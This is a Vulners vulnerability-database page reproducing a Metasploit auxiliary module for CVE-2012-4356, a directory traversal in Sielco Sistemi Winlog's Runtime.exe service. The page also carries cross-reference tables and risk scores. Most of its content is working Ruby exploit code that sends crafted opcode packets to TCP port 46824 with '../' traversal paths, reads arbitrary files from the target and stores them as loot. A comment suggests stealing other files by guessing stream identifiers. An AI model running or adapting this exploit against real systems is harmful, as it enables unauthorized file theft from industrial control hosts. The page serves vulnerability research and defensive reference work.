Vulners
Lucene search
Sielco Sistemi Winlog Remote File Access
🗓️ 31 Aug 2024 00:00:00Reported by Luigi Auriemma, juan vazquez, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 165 Views
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | CVE-2012-4356 | 27 Jun 201200:00 | – | circl |
 | CVE-2012-4356 | 19 Aug 201220:00 | – | cve |
 | CVE-2012-4356 | 19 Aug 201220:00 | – | cvelist |
 | Sielco Sistemi Winlog Multiple Vulnerabilities | 4 May 201206:00 | – | ics |
 | Sielco Sistemi Winlog Remote File Access | 12 Jul 201211:12 | – | metasploit |
 | CVE-2012-4356 | 19 Aug 201220:55 | – | nvd |
 | Sielco Sistemi Winlog Multiple Vulnerabilities | 28 Jun 201200:00 | – | openvas |
 | Directory traversal | 19 Aug 201220:55 | – | prion |
 | CVE-2012-4356 | 22 May 202502:14 | – | redhatcve |
 | Sielco Sistemi Winlog < 2.07.17 Multiple Vulnerabilities | 10 Sep 201200:00 | – | nessus |
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'Sielco Sistemi Winlog Remote File Access',
'Description' => %q{
This module exploits a directory traversal in Sielco Sistemi Winlog. The vulnerability
exists in the Runtime.exe service and can be triggered by sending a specially crafted packet
to the 46824/TCP port. This module has been successfully tested on Sielco Sistemi Winlog Lite
2.07.14.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Luigi Auriemma', # Vulnerability Discovery and PoC
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2012-4356' ],
[ 'OSVDB', '83275' ],
[ 'BID', '54212' ],
[ 'EDB', '19409'],
[ 'URL', 'http://aluigi.altervista.org/adv/winlog_2-adv.txt' ]
]
))
register_options(
[
Opt::RPORT(46824),
OptString.new('FILEPATH', [true, 'The name of the file to download', '/WINDOWS/system32/drivers/etc/hosts']),
OptInt.new('DEPTH', [true, 'Traversal depth', 10])
])
end
def run_host(ip)
# No point to continue if no filename is specified
if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?
print_error("#{ip}:#{rport} - Please supply the name of the file you want to download")
return
end
travs = "../" * datastore['DEPTH']
if datastore['FILEPATH'][0] == "/"
travs << datastore['FILEPATH'][1, datastore['FILEPATH'].length]
else
travs << datastore['FILEPATH']
end
connect
# Open File through _TCPIPS_BinOpenFileFP
packet = "\x00" * 20
packet << "\x78" # Opcode
packet << travs # Path traversal
packet << "\x00"
sock.put(packet)
response = sock.get_once(5, 1) || ''
if response.unpack("C").first != 0x78
print_error "#{ip}:#{rport} - Error opening file"
return
end
# The stream allows to identify our file since the
# server could be handling multiple files simultaneously.
# Since the stream identifier is just an offset in an array
# of opened streams it could be used to guess other files
# opened by the server and stole them :-) just an idea....
stream = response[1, 4]
# Get File Length through _TCPIPS_BinGetFileSizeFP
packet = "\x00" * 20
packet << "\x79" # Opcode
packet << stream # stream
packet << "\x00" * 7
sock.put(packet)
response = sock.get_once(5, 1) || ''
if response.unpack("C").first != 0x79
print_error "#{ip}:#{rport} - Error getting the file length"
return
end
file_length = response[1,4].unpack("V").first
# Read File with the help of _TCPIPS_BinGetStringRecordFP
contents = ""
offset = 0
while contents.length < file_length
packet = "\x00" * 20
packet << "\x98" # Opcode
packet << [offset].pack("V") # offset (blocks of 0x55)
packet << stream # stream
packet << "\x00" * 3
sock.put(packet)
response = ""
while response.length < 0x7ac # Packets of 0x7ac (header (0x9) + block of data (0x7a3))
response << sock.get_once(0x7ac-response.length, 5) || ''
end
if response.unpack("C").first != 0x98
print_error "#{ip}:#{rport} - Error reading the file, anyway we're going to try to finish"
end
if (file_length - contents.length) < response.length - 9
contents << response[9, file_length - contents.length] # last packet
else
contents << response[9, response.length] # no last packet
end
offset = offset + 0x17 # 17 blocks in every packet
end
# Close File through _TCPIPS_BinCloseFileFP
packet = "\x00" * 20
packet << "\x7B"
packet << "\x00" * 11
sock.put(packet)
response = sock.get_once(-1, 1) || ''
if response.unpack("C").first != 0x7B
print_error "#{ip}:#{rport} - Error closing file file, anyway we're going to try to finish"
end
disconnect
print_good "#{ip}:#{rport} - File retrieved successfully!"
fname = File.basename(datastore['FILEPATH'])
path = store_loot(
'sielcosistemi.winlog',
'application/octet-stream',
ip,
contents,
fname,
datastore['FILEPATH']
)
print_status("#{ip}:#{rport} - File saved in: #{path}")
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Aug 2024 00:00Current
7High risk
Vulners AI Score7
CVSS 24.3
EPSS0.60631